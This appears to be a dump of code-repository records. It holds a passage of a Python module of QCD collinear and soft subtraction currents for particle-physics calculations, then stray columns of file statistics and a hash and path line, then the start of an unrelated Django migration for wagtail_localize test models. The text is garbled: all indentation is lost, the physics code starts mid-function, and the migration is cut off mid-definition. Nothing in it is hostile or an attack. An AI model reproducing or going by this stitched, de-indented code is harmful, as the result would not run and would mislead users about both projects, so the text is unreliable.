leg_numbers_map=None, reduced_process=None, hel_config=None,
Q=None, **opts ):
if higher_PS_point is None or lower_PS_point is None:
raise CurrentImplementationError(
self.name() + " needs the phase-space points before and after mapping." )
if leg_numbers_map is None:
raise CurrentImplementationError(
self.name() + " requires a leg numbers map, i.e. a momentum dictionary." )
if reduced_process is None:
raise CurrentImplementationError(
self.name() + " requires a reduced_process.")
if not hel_config is None:
raise CurrentImplementationError(
self.name() + " does not support helicity assignment." )
if Q is None:
raise CurrentImplementationError(
self.name() + " requires the total mapping momentum Q." )
# Retrieve alpha_s and mu_r
model_param_dict = self.model.get('parameter_dict')
alpha_s = model_param_dict['aS']
mu_r = model_param_dict['MU_R']
# Include the counterterm only in a part of the phase space
children = self.get_sorted_children(current, self.model)
parent = leg_numbers_map.inv[frozenset(children)]
pC = sum(higher_PS_point[child] for child in children)
qC = lower_PS_point[parent]
if self.is_cut(Q=Q, pC=pC):
return utils.SubtractionCurrentResult.zero(
current=current, hel_config=hel_config)
# Evaluate collinear subtracted kernel
zs, kTs = self.variables(higher_PS_point, lower_PS_point[parent], children, Q=Q)
evaluation = self.evaluate_kernel(zs, kTs, parent)
# Find all colored leg numbers except for the parent in the reduced process
all_colored_parton_numbers = []
for leg in reduced_process.get('legs'):
if self.model.get_particle(leg.get('id')).get('color') == 1:
continue
all_colored_parton_numbers.append(leg.get('number'))
color_correlation_index = 1
ps = higher_PS_point[children[0]]
pi = higher_PS_point[children[1]]
# Now loop over the colored parton number pairs (parent, j)
# and add the corresponding contributions to this current
for j in all_colored_parton_numbers:
# Write the eikonal for that pair
if j == parent:
continue
# pj = sum(higher_PS_point[child] for child in leg_numbers_map[j])
# pj = higher_PS_point[j]
qj = lower_PS_point[j]
evaluation['color_correlations'].append(((parent, j),))
# eiks = -mod_eikonal(pi, pj, ps)
mod = (qj.dot(qC)) / (qj.dot(pi+ps))
qjmod = mod * qj
eiks = -mod_eikonal(pi, qjmod, ps)
evaluation['values'][(0, color_correlation_index)] = {'finite': eiks}
color_correlation_index += 1
# Add the normalization factors
pC2 = pC.square()
norm = 8. * math.pi * alpha_s / pC2
norm *= self.factor(Q=Q, pC=pC, qC=qC)
for k in evaluation['values']:
evaluation['values'][k]['finite'] *= norm
# Construct and return result
result = utils.SubtractionCurrentResult()
result.add_result(
evaluation,
hel_config=hel_config,
squared_orders=tuple(sorted(current.get('squared_orders').items())))
return result
class QCD_final_collinear_0_gg(currents.QCDLocalCollinearCurrent):
"""g g collinear tree-level current."""
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD collinear tree-level currents
init_vars = cls.common_does_implement_this_current(current, 2, 0)
if init_vars is None: return None
# Retrieve singular structure
ss = current.get('singular_structure')
# Check that the particles are two final-state massless gluons
if len(ss.legs) != 2: return None
for leg in ss.legs:
if not cls.is_gluon(leg, model): return None
if not cls.is_massless(leg, model): return None
if cls.is_initial(leg): return None
# The current is valid
return init_vars
@classmethod
def get_sorted_children(cls, current, model):
legs = current.get('singular_structure').legs
return tuple(leg.n for leg in legs)
def evaluate_kernel(self, zs, kTs, parent):
# Retrieve the collinear variables
z = zs[0]
kT = kTs[0]
# Instantiate the structure of the result
evaluation = utils.SubtractionCurrentEvaluation({
'spin_correlations' : [None, ((parent,( kT, )), ), ],
'color_correlations' : [None],
'values' : {(0, 0): {'finite': None},
(1, 0): {'finite': None}, }
})
# The line below implements the g_{\mu\nu} part of the splitting kernel.
# Notice that the extra longitudinal terms included in the spin-correlation 'None'
# from the relation:
# \sum_\lambda \epsilon_\lambda^\mu \epsilon_\lambda^{\star\nu}
# = g^{\mu\nu} + longitudinal terms
# are irrelevant because Ward identities evaluate them to zero anyway.
# We must subtract the soft-collinear (CxS *not* SxC) from this contribution:
# P_gg = 2.*self.CA * ( (1.-z) / z + z / (1.- z) )
# CxS(P_gg) = 2.*self.CA * ( (1.-z) / z + z / (1.- z) )
# SxC(P_gg) = 2.*self.CA * ( 1 / z + 1 / (1.- z) )
# P_gg-CxS(P_gg) = 0
# P_gg-SxC(P_gg) = -4.*self.CA
evaluation['values'][(0, 0)]['finite'] = -4.*self.CA
evaluation['values'][(1, 0)]['finite'] = -2.*self.CA * 2.*z*(1.-z) / kT.square()
return evaluation
def evaluate_subtraction_current(
self, current,
higher_PS_point=None, lower_PS_point=None,
leg_numbers_map=None, reduced_process=None, hel_config=None,
Q=None, **opts ):
if higher_PS_point is None or lower_PS_point is None:
raise CurrentImplementationError(
self.name() + " needs the phase-space points before and after mapping." )
if leg_numbers_map is None:
raise CurrentImplementationError(
self.name() + " requires a leg numbers map, i.e. a momentum dictionary." )
if reduced_process is None:
raise CurrentImplementationError(
self.name() + " requires a reduced_process.")
if not hel_config is None:
raise CurrentImplementationError(
self.name() + " does not support helicity assignment." )
if Q is None:
raise CurrentImplementationError(
self.name() + " requires the total mapping momentum Q." )
# Retrieve alpha_s and mu_r
model_param_dict = self.model.get('parameter_dict')
alpha_s = model_param_dict['aS']
mu_r = model_param_dict['MU_R']
# Include the counterterm only in a part of the phase space
children = self.get_sorted_children(current, self.model)
parent = leg_numbers_map.inv[frozenset(children)]
pC = sum(higher_PS_point[child] for child in children)
qC = lower_PS_point[parent]
if self.is_cut(Q=Q, pC=pC):
return utils.SubtractionCurrentResult.zero(
current=current, hel_config=hel_config)
# Evaluate collinear subtracted kernel
zs, kTs = self.variables(higher_PS_point, lower_PS_point[parent], children, Q=Q)
evaluation = self.evaluate_kernel(zs, kTs, parent)
# Find all colored leg numbers except for the parent in the reduced process
all_colored_parton_numbers = []
for leg in reduced_process.get('legs'):
if self.model.get_particle(leg.get('id')).get('color') == 1:
continue
all_colored_parton_numbers.append(leg.get('number'))
color_correlation_index = 1
p0 = higher_PS_point[children[0]]
p1 = higher_PS_point[children[1]]
# Loop over the colored parton number pairs (parent, j)
# and add the corresponding contributions to this current
for j in all_colored_parton_numbers:
# Write the eikonal for that pair
if j == parent:
continue
# pj = higher_PS_point[j]
# pj = sum(higher_PS_point[child] for child in leg_numbers_map[j])
qj = lower_PS_point[j]
# eik0 = -mod_eikonal(pj, p1, p0)
# eik1 = -mod_eikonal(pj, p0, p1)
eik0 = -mod_eikonal(qj, qC, p0)
eik1 = -mod_eikonal(qj, qC, p1)
evaluation['color_correlations'].append(((parent, j),))
evaluation['values'][(0, color_correlation_index)] = {'finite': eik0 + eik1}
color_correlation_index += 1
# Add the normalization factors
pC2 = pC.square()
norm = 8. * math.pi * alpha_s / pC2
norm *= self.factor(Q=Q, pC=pC, qC=qC)
for k in evaluation['values']:
evaluation['values'][k]['finite'] *= norm
# Construct and return result
result = utils.SubtractionCurrentResult()
result.add_result(
evaluation,
hel_config=hel_config,
squared_orders=tuple(sorted(current.get('squared_orders').items())))
return result
#=========================================================================================
# NLO initial-collinear currents, containing the soft limits
#=========================================================================================
class QCD_initial_collinear_0_gq(currents.QCDLocalCollinearCurrent):
"""gq collinear ISR tree-level current.
q(initial) > g(initial_after_emission) q(final)
"""
variables = staticmethod(currents.Q_initial_coll_variables)
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD collinear tree-level currents
init_vars = cls.common_does_implement_this_current(current, 2, 0)
if init_vars is None: return None
# Retrieve singular structure
ss = current.get('singular_structure')
# Check that the particles are a massless quark and its anti-quark in final-state
if len(ss.legs) != 2: return None
n_initial_state_quarks = 0
for leg in ss.legs:
if cls.is_quark(leg, model) and cls.is_initial(leg):
n_initial_state_quarks += 1
if n_initial_state_quarks != 1: return None
n_final_state_quarks = 0
for leg in ss.legs:
if cls.is_quark(leg, model) and not cls.is_initial(leg):
n_final_state_quarks += 1
if n_final_state_quarks != 1: return None
# The current is valid
return init_vars
@classmethod
def get_sorted_children(cls, current, model):
legs = current.get('singular_structure').legs
# Always put the initial state child first
children_numbers = [leg.n for leg in legs if leg.state == leg.INITIAL]
# Then the final state ones
children_numbers.extend([leg.n for leg in legs if leg.state == leg.FINAL])
return tuple(children_numbers)
def evaluate_kernel(self, xs, kTs, parent):
# Retrieve the collinear variable x
x = xs[0]
kT = kTs[0]
evaluation = utils.SubtractionCurrentEvaluation({
'spin_correlations' : [None, ((parent, (kT, )), ), ],
'color_correlations' : [None],
'values' : {(0, 0): {'finite': None},
(1, 0): {'finite': None}, }
})
# The factor 'x' that should be part of the initial_state_crossing_factor cancels
# against the extra prefactor 1/x in the collinear factorization formula
# (see Eq. (8) of NNLO compatible NLO scheme publication arXiv:0903.1218v2)
initial_state_crossing_factor = -1.
# Correct for the ratio of color-averaging factor between the real ME
# initial state flavor (quark) and the one of the reduced Born ME (gluon)
initial_state_crossing_factor *= ((self.NC**2-1)/float(self.NC))
z = 1./x
# We re-use here the Altarelli-Parisi Kernel of the P_q\bar{q} final state kernel
# The line below implements the g_{\mu\nu} part of the splitting kernel.
# Notice that the extra longitudinal terms included in the spin-correlation 'None'
# from the relation:
# \sum_\lambda \epsilon_\lambda^\mu \epsilon_\lambda^{\star\nu}
# = g^{\mu\nu} + longitudinal terms
# are irrelevant because Ward identities evaluate them to zero anyway.
norm = initial_state_crossing_factor * self.TR
evaluation['values'][(0, 0)]['finite'] = norm
evaluation['values'][(1, 0)]['finite'] = norm * 4. * z*(1.-z) / kT.square()
return evaluation
class QCD_initial_collinear_0_qq(currents.QCDLocalCollinearCurrent):
""" qq collinear ISR tree-level current.
g(initial) > q(initial_after_emission) qx(final).
"""
variables = staticmethod(currents.Q_initial_coll_variables)
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD collinear tree-level currents
init_vars = cls.common_does_implement_this_current(current, 2, 0)
if init_vars is None: return None
# Retrieve singular structure
ss = current.get('singular_structure')
if len(ss.legs) != 2: return None
n_initial_state_gluons = 0
for leg in ss.legs:
if cls.is_gluon(leg, model) and cls.is_initial(leg):
n_initial_state_gluons += 1
if n_initial_state_gluons != 1: return None
n_final_state_quarks = 0
for leg in ss.legs:
if cls.is_quark(leg, model) and not cls.is_initial(leg):
n_final_state_quarks += 1
if n_final_state_quarks != 1: return None
# The current is valid
return init_vars
@classmethod
def get_sorted_children(cls, current, model):
legs = current.get('singular_structure').legs
# Always put the initial state child first
children_numbers = [leg.n for leg in legs if leg.state == leg.INITIAL]
# Then the final state ones
children_numbers.extend([leg.n for leg in legs if leg.state == leg.FINAL])
return tuple(children_numbers)
def evaluate_kernel(self, xs, kTs, parent):
# Retrieve the collinear variable x
x = xs[0]
# Instantiate the structure of the result
evaluation = utils.SubtractionCurrentEvaluation({
'spin_correlations' : [None],
'color_correlations' : [None],
'values' : {(0, 0): {'finite': None}}
})
# The factor 'x' that should be part of the initial_state_crossing_factor cancels
# against the extra prefactor 1/x in the collinear factorization formula
# (see Eq. (8) of NNLO compatible NLO scheme publication arXiv:0903.1218v2)
initial_state_crossing_factor = 1.
# Correct for the ratio of color-averaging factor between the real ME
# initial state flavor (gluon) and the one of the reduced Born ME (quark)
initial_state_crossing_factor *= (self.NC/float(self.NC**2-1))
z = 1./x
norm = initial_state_crossing_factor * self.CF
# We re-use here the Altarelli-Parisi Kernel of the P_gq final state kernel without
# the soft-subtractio term 2./z since the gluon is here in the initial state
evaluation['values'][(0, 0)]['finite'] = norm * (1. + (1.-z)**2) / z
return evaluation
class QCD_initial_collinear_0_qg(currents.QCDLocalCollinearCurrent):
"""qg collinear ISR tree-level current.
q(initial) > q(initial_after_emission) g(final)
"""
variables = staticmethod(currents.Q_initial_coll_variables)
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD collinear tree-level currents
init_vars = cls.common_does_implement_this_current(current, 2, 0)
if init_vars is None: return None
# Retrieve singular structure
ss = current.get('singular_structure')
if len(ss.legs) != 2: return None
n_initial_state_quarks = 0
for leg in ss.legs:
if cls.is_quark(leg, model) and cls.is_initial(leg):
n_initial_state_quarks += 1
if n_initial_state_quarks != 1: return None
n_final_state_gluon = 0
for leg in ss.legs:
if cls.is_gluon(leg, model) and not cls.is_initial(leg):
n_final_state_gluon += 1
if n_final_state_gluon != 1: return None
# The current is valid
return init_vars
@classmethod
def get_sorted_children(cls, current, model):
legs = current.get('singular_structure').legs
# Always put the initial state child first
children_numbers = [leg.n for leg in legs if leg.state == leg.INITIAL]
# Then the final state ones
children_numbers.extend([leg.n for leg in legs if leg.state == leg.FINAL])
return tuple(children_numbers)
def evaluate_kernel(self, xs, kTs, parent):
# Retrieve the collinear variable x
x = xs[0]
# Instantiate the structure of the result
evaluation = utils.SubtractionCurrentEvaluation({
'spin_correlations' : [None],
'color_correlations' : [None],
'values' : {(0, 0): {'finite': None}}
})
# The factor 'x' that should be part of the initial_state_crossing_factor cancels
# against the extra prefactor 1/x in the collinear factorization formula
# (see Eq. (8) of NNLO compatible NLO scheme publication arXiv:0903.1218v2)
initial_state_crossing_factor = 1.
# Correct for the ratio of color-averaging factor between the real ME
# initial state flavor (quark) and the one of the reduced Born ME (quark)
initial_state_crossing_factor *= 1.
z = 1./x
# We re-use here the Altarelli-Parisi Kernel of the P_qg final state kernel, including
# its soft subtraction
# We must subtract the soft-collinear (CxS *not* SxC) from this contribution:
# P_qg = self.CF * ( (1.+z**2)/(1.-z) )
# CxS(P_qg) = self.CF * ( 2 / (x - 1) ) = self.CF * ( 2 z / (1 - z) )
# P_qg-CxS(P_qg) = self.CF * (1 + z**2 - 2*z) / (1 - z) = self.CF * ( 1 - z)
norm = initial_state_crossing_factor * self.CF
evaluation['values'][(0, 0)]['finite'] = norm * (1 - z)
return evaluation
def evaluate_subtraction_current(
self, current,
higher_PS_point=None, lower_PS_point=None,
leg_numbers_map=None, reduced_process=None, hel_config=None,
Q=None, **opts ):
"""Add the distributed partial fractioned soft eikonal approximation
to this hard collinear current
"""
if higher_PS_point is None or lower_PS_point is None:
raise CurrentImplementationError(
self.name() + " needs the phase-space points before and after mapping." )
if leg_numbers_map is None:
raise CurrentImplementationError(
self.name() + " requires a leg numbers map, i.e. a momentum dictionary." )
if reduced_process is None:
raise CurrentImplementationError(
self.name() + " requires a reduced_process.")
if not hel_config is None:
raise CurrentImplementationError(
self.name() + " does not support helicity assignment." )
if Q is None:
raise CurrentImplementationError(
self.name() + " requires the total mapping momentum Q." )
# Retrieve alpha_s and mu_r
model_param_dict = self.model.get('parameter_dict')
alpha_s = model_param_dict['aS']
mu_r = model_param_dict['MU_R']
# Include the counterterm only in a part of the phase space
children = self.get_sorted_children(current, self.model)
parent = leg_numbers_map.inv[frozenset(children)]
pC = higher_PS_point[children[0]]
pC -= sum(higher_PS_point[child] for child in children[1:])
if self.is_cut(Q=Q, pC=pC):
return utils.SubtractionCurrentResult.zero(
current=current, hel_config=hel_config)
# Evaluate collinear subtracted kernel
zs, kTs = self.variables(higher_PS_point, lower_PS_point[parent], children, Q=Q)
evaluation = self.evaluate_kernel(zs, kTs, parent)
# Find all colored leg numbers except for the parent in the reduced process
all_colored_parton_numbers = []
for leg in reduced_process.get('legs'):
if self.model.get_particle(leg.get('id')).get('color') == 1:
continue
all_colored_parton_numbers.append(leg.get('number'))
color_correlation_index = 1
ps = higher_PS_point[children[1]]
pi = higher_PS_point[children[0]]
# pi = lower_PS_point[parent]
# Loop over the colored parton number pairs (parent, j)
# and add the corresponding contributions to this current
for j in all_colored_parton_numbers:
# Write the eikonal for that pair
# (positive here since the dipole end 'children[0]' is in the initial state)
if j == parent:
continue
pj = higher_PS_point[j]
# pj = sum(higher_PS_point[child] for child in leg_numbers_map[j])
# pj = lower_PS_point[j]
eik1 = mod_eikonal(pi, pj, ps)
evaluation['color_correlations'].append(((parent, j),))
evaluation['values'][(0, color_correlation_index)] = {'finite': eik1}
color_correlation_index += 1
# Add the normalization factors
pC2 = pC.square()
norm = 8. * math.pi * alpha_s / pC2
norm *= self.factor(Q=Q, pC=pC)
for k in evaluation['values']:
evaluation['values'][k]['finite'] *= norm
# Construct and return result
result = utils.SubtractionCurrentResult()
result.add_result(
evaluation,
hel_config=hel_config,
squared_orders=tuple(sorted(current.get('squared_orders').items())))
return result
class QCD_initial_collinear_0_gg(currents.QCDLocalCollinearCurrent):
"""gg collinear ISR tree-level current. g(initial) > g(initial_after_emission) g(final)"""
variables = staticmethod(currents.Q_initial_coll_variables)
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD collinear tree-level currents
init_vars = cls.common_does_implement_this_current(current, 2, 0)
if init_vars is None: return None
# Retrieve singular structure
ss = current.get('singular_structure')
if len(ss.legs) != 2: return None
n_initial_state_gluons = 0
for leg in ss.legs:
if cls.is_gluon(leg, model) and cls.is_initial(leg):
n_initial_state_gluons += 1
if n_initial_state_gluons != 1: return None
n_final_state_gluons = 0
for leg in ss.legs:
if cls.is_gluon(leg, model) and not cls.is_initial(leg):
n_final_state_gluons += 1
if n_final_state_gluons != 1: return None
# The current is valid
return init_vars
@classmethod
def get_sorted_children(cls, current, model):
legs = current.get('singular_structure').legs
# Always put the initial state child first
children_numbers = [leg.n for leg in legs if leg.state == leg.INITIAL]
# Then the final state ones
children_numbers.extend([leg.n for leg in legs if leg.state == leg.FINAL])
return tuple(children_numbers)
def evaluate_kernel(self, xs, kTs, parent):
# Retrieve the collinear variable x
x = xs[0]
kT = kTs[0]
# Instantiate the structure of the result
evaluation = utils.SubtractionCurrentEvaluation({
'spin_correlations' : [None, ((parent,( kT, )), ), ],
'color_correlations' : [None],
'values' : {(0, 0): {'finite': None},
(1, 0): {'finite': None}, }
})
# The factor 'x' that should be part of the initial_state_crossing_factor cancels
# against the extra prefactor 1/x in the collinear factorization formula
# (see Eq. (8) of NNLO compatible NLO scheme publication arXiv:0903.1218v2)
initial_state_crossing_factor = 1.
# Correct for the ratio of color-averaging factor between the real ME
# initial state flavor (gluon) and the one of the reduced Born ME (gluon)
initial_state_crossing_factor *= 1.
z = 1./x
# The line below implements the g_{\mu\nu} part of the splitting kernel.
# Notice that the extra longitudinal terms included in the spin-correlation 'None'
# from the relation:
# \sum_\lambda \epsilon_\lambda^\mu \epsilon_\lambda^{\star\nu}
# = g^{\mu\nu} + longitudinal terms
# are irrelevant because Ward identities evaluate them to zero anyway.
# We re-use here the Altarelli-Parisi Kernel of the P_qg final state kernel, including
# its soft subtraction
# We must subtract the soft-collinear (CxS *not* SxC) from this contribution:
# P_gg = 2.*self.CA * ( (z/(1.-z)) + ((1.-z)/z) )
# CxS(P_gg) = 2.*self.CA * ( (z/(1.-z)) )
# P_gg-CxS(P_gg) = 2.*self.CA * ((1.-z)/z)
norm = initial_state_crossing_factor * 2. * self.CA
evaluation['values'][(0, 0)]['finite'] = norm * ((1.-z)/z)
evaluation['values'][(1, 0)]['finite'] = -norm * 2.*z*(1.-z) / kT.square()
return evaluation
def evaluate_subtraction_current(
self, current,
higher_PS_point=None, lower_PS_point=None,
leg_numbers_map=None, reduced_process=None, hel_config=None,
Q=None, **opts ):
"""Add the distributed partial fractioned soft eikonal approximation
to this hard collinear current
"""
if higher_PS_point is None or lower_PS_point is None:
raise CurrentImplementationError(
self.name() + " needs the phase-space points before and after mapping." )
if leg_numbers_map is None:
raise CurrentImplementationError(
self.name() + " requires a leg numbers map, i.e. a momentum dictionary." )
if reduced_process is None:
raise CurrentImplementationError(
self.name() + " requires a reduced_process.")
if not hel_config is None:
raise CurrentImplementationError(
self.name() + " does not support helicity assignment." )
if Q is None:
raise CurrentImplementationError(
self.name() + " requires the total mapping momentum Q." )
# Retrieve alpha_s and mu_r
model_param_dict = self.model.get('parameter_dict')
alpha_s = model_param_dict['aS']
mu_r = model_param_dict['MU_R']
# Include the counterterm only in a part of the phase space
children = self.get_sorted_children(current, self.model)
parent = leg_numbers_map.inv[frozenset(children)]
pC = higher_PS_point[children[0]]
pC -= sum(higher_PS_point[child] for child in children[1:])
if self.is_cut(Q=Q, pC=pC):
return utils.SubtractionCurrentResult.zero(
current=current, hel_config=hel_config)
# Evaluate collinear subtracted kernel
zs, kTs = self.variables(higher_PS_point, lower_PS_point[parent], children, Q=Q)
evaluation = self.evaluate_kernel(zs, kTs, parent)
# Find all colored leg numbers except for the parent in the reduced process
all_colored_parton_numbers = []
for leg in reduced_process.get('legs'):
if self.model.get_particle(leg.get('id')).get('color') == 1:
continue
all_colored_parton_numbers.append(leg.get('number'))
color_correlation_index = 1
ps = higher_PS_point[children[1]]
pi = higher_PS_point[children[0]]
# pi = lower_PS_point[parent]
# Loop over the colored parton number pairs (parent, j)
# and add the corresponding contributions to this current
for j in all_colored_parton_numbers:
# Write the eikonal for that pair
# (positive here since the dipole end 'children[0]' is in the initial state)
if j == parent:
continue
pj = higher_PS_point[j]
# pj = sum(higher_PS_point[child] for child in leg_numbers_map[j])
# pj = lower_PS_point[j]
eik1 = mod_eikonal(pi, pj, ps)
evaluation['color_correlations'].append(((parent, j),))
evaluation['values'][(0, color_correlation_index)] = {'finite': eik1}
color_correlation_index += 1
# Add the normalization factors
pC2 = pC.square()
norm = 8. * math.pi * alpha_s / pC2
norm *= self.factor(Q=Q, pC=pC)
for k in evaluation['values']:
evaluation['values'][k]['finite'] *= norm
# Construct and return result
result = utils.SubtractionCurrentResult()
result.add_result(
evaluation,
hel_config=hel_config,
squared_orders=tuple(sorted(current.get('squared_orders').items())))
return result
#=========================================================================================
# NLO soft current
#=========================================================================================
class NoSoftCurrent(currents.QCDCurrent):
"""Trivial current returning zero for any NLO limit containing softs."""
is_zero = True
@classmethod
def does_implement_this_current(cls, current, model):
# Check the general properties common to NLO QCD soft tree-level currents
init_vars = currents.QCDLocalSoftCurrent.\
common_does_implement_this_current(current, 2, 0)
if init_vars is not None:
return init_vars
init_vars = currents.QCDLocalSoftCollinearCurrent.\
common_does_implement_this_current(current, 2, 0)
return init_vars
def evaluate_subtraction_current(
self, current, hel_config=None, **opts ):
"""Return 0 for this current."""
return utils.SubtractionCurrentResult.zero(current=current, hel_config=hel_config)
| 42.24297
| 94
| 0.605102
| 4,703
| 37,554
| 4.673825
| 0.079524
| 0.017197
| 0.020108
| 0.033665
| 0.912743
| 0.884218
| 0.869433
| 0.847186
| 0.837405
| 0.830626
| 0
| 0.011433
| 0.278
| 37,554
| 888
| 95
| 42.290541
| 0.799255
| 0.295281
| 0
| 0.870334
| 0
| 0
| 0.076979
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05501
| false
| 0.003929
| 0.007859
| 0
| 0.153242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb2dec0845e74fbef60099ea717533927237e6d9
| 9,597
|
py
|
Python
|
wagtail_localize/test/migrations/0001_initial.py
|
KalobTaulien/wagtail-localize
|
e513d18dea5f76f6941f1acf55f945150de767eb
|
[
"BSD-3-Clause"
] | 123
|
2019-11-21T12:55:04.000Z
|
2022-03-23T08:08:47.000Z
|
wagtail_localize/test/migrations/0001_initial.py
|
KalobTaulien/wagtail-localize
|
e513d18dea5f76f6941f1acf55f945150de767eb
|
[
"BSD-3-Clause"
] | 334
|
2019-11-20T10:40:08.000Z
|
2022-03-27T17:33:01.000Z
|
wagtail_localize/test/migrations/0001_initial.py
|
KalobTaulien/wagtail-localize
|
e513d18dea5f76f6941f1acf55f945150de767eb
|
[
"BSD-3-Clause"
] | 41
|
2020-01-16T17:24:52.000Z
|
2022-03-28T13:09:59.000Z
|
# Generated by Django 3.0.6 on 2020-07-17 15:07
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import uuid
import wagtail.core.blocks
import wagtail.core.fields
import wagtail_localize.test.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailcore', '0057_page_locale_fields_notnull'),
]
operations = [
migrations.CreateModel(
name='TestHomePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='TestModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('translation_key', models.UUIDField(default=uuid.uuid4, editable=False)),
('title', models.CharField(max_length=255)),
('test_charfield', models.CharField(blank=True, max_length=255)),
('test_textfield', models.TextField(blank=True)),
('test_emailfield', models.EmailField(blank=True, max_length=254)),
('locale', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='wagtailcore.Locale')),
],
options={
'abstract': False,
'unique_together': {('translation_key', 'locale')},
},
),
migrations.CreateModel(
name='TestPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('test_charfield', models.CharField(blank=True, max_length=255)),
('test_textfield', models.TextField(blank=True)),
('test_emailfield', models.EmailField(blank=True, max_length=254)),
('test_slugfield', models.SlugField(blank=True)),
('test_urlfield', models.URLField(blank=True)),
('test_richtextfield', wagtail.core.fields.RichTextField(blank=True)),
('test_streamfield', wagtail.core.fields.StreamField([('test_charblock', wagtail.core.blocks.CharBlock(max_length=255)), ('test_textblock', wagtail.core.blocks.TextBlock()), ('test_emailblock', wagtail.core.blocks.EmailBlock()), ('test_urlblock', wagtail.core.blocks.URLBlock()), ('test_richtextblock', wagtail.core.blocks.RichTextBlock()), ('test_rawhtmlblock', wagtail.core.blocks.RawHTMLBlock()), ('test_blockquoteblock', wagtail.core.blocks.BlockQuoteBlock()), ('test_structblock', wagtail.core.blocks.StructBlock([('field_a', wagtail.core.blocks.TextBlock()), ('field_b', wagtail.core.blocks.TextBlock())])), ('test_listblock', wagtail.core.blocks.ListBlock(wagtail.core.blocks.TextBlock())), ('test_nestedstreamblock', wagtail.core.blocks.StreamBlock([('block_a', wagtail.core.blocks.TextBlock()), ('block_b', wagtail.core.blocks.TextBlock())])), ('test_customstructblock', wagtail.core.blocks.StructBlock([('field_a', wagtail.core.blocks.TextBlock()), ('field_b', wagtail.core.blocks.TextBlock())]))], blank=True)),
('test_customfield', wagtail_localize.test.models.TestCustomField(blank=True)),
('test_synchronized_charfield', models.CharField(blank=True, max_length=255)),
('test_synchronized_textfield', models.TextField(blank=True)),
('test_synchronized_emailfield', models.EmailField(blank=True, max_length=254)),
('test_synchronized_slugfield', models.SlugField(blank=True)),
('test_synchronized_urlfield', models.URLField(blank=True)),
('test_synchronized_richtextfield', wagtail.core.fields.RichTextField(blank=True)),
('test_synchronized_streamfield', wagtail.core.fields.StreamField([('test_charblock', wagtail.core.blocks.CharBlock(max_length=255)), ('test_textblock', wagtail.core.blocks.TextBlock()), ('test_emailblock', wagtail.core.blocks.EmailBlock()), ('test_urlblock', wagtail.core.blocks.URLBlock()), ('test_richtextblock', wagtail.core.blocks.RichTextBlock()), ('test_rawhtmlblock', wagtail.core.blocks.RawHTMLBlock()), ('test_blockquoteblock', wagtail.core.blocks.BlockQuoteBlock()), ('test_structblock', wagtail.core.blocks.StructBlock([('field_a', wagtail.core.blocks.TextBlock()), ('field_b', wagtail.core.blocks.TextBlock())])), ('test_listblock', wagtail.core.blocks.ListBlock(wagtail.core.blocks.TextBlock())), ('test_nestedstreamblock', wagtail.core.blocks.StreamBlock([('block_a', wagtail.core.blocks.TextBlock()), ('block_b', wagtail.core.blocks.TextBlock())])), ('test_customstructblock', wagtail.core.blocks.StructBlock([('field_a', wagtail.core.blocks.TextBlock()), ('field_b', wagtail.core.blocks.TextBlock())]))], blank=True)),
('test_synchronized_customfield', wagtail_localize.test.models.TestCustomField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='InheritedTestModel',
fields=[
('testmodel_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtail_localize_test.TestModel')),
],
bases=('wagtail_localize_test.testmodel',),
),
migrations.CreateModel(
name='TestSynchronizedChildObject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('field', models.TextField()),
('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='test_synchronized_childobjects', to='wagtail_localize_test.TestPage')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='TestSnippet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('translation_key', models.UUIDField(default=uuid.uuid4, editable=False)),
('field', models.TextField()),
('locale', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='wagtailcore.Locale')),
],
options={
'abstract': False,
'unique_together': {('translation_key', 'locale')},
},
),
migrations.AddField(
model_name='testpage',
name='test_snippet',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='wagtail_localize_test.TestSnippet'),
),
migrations.AddField(
model_name='testpage',
name='test_synchronized_snippet',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtail_localize_test.TestSnippet'),
),
migrations.CreateModel(
name='TestNonParentalChildObject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('translation_key', models.UUIDField(default=uuid.uuid4, editable=False)),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('field', models.TextField()),
('locale', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='wagtailcore.Locale')),
